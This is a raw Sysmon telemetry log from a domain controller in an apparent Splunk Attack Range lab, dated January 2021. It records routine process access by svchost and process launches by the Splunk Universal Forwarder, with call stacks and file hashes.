13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.736{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.205{59A5CD1D-90D0-6005-4301-00000000A301}48204852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:48.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.064{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.065{59A5CD1D-90D0-6005-4301-00000000A301}4820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
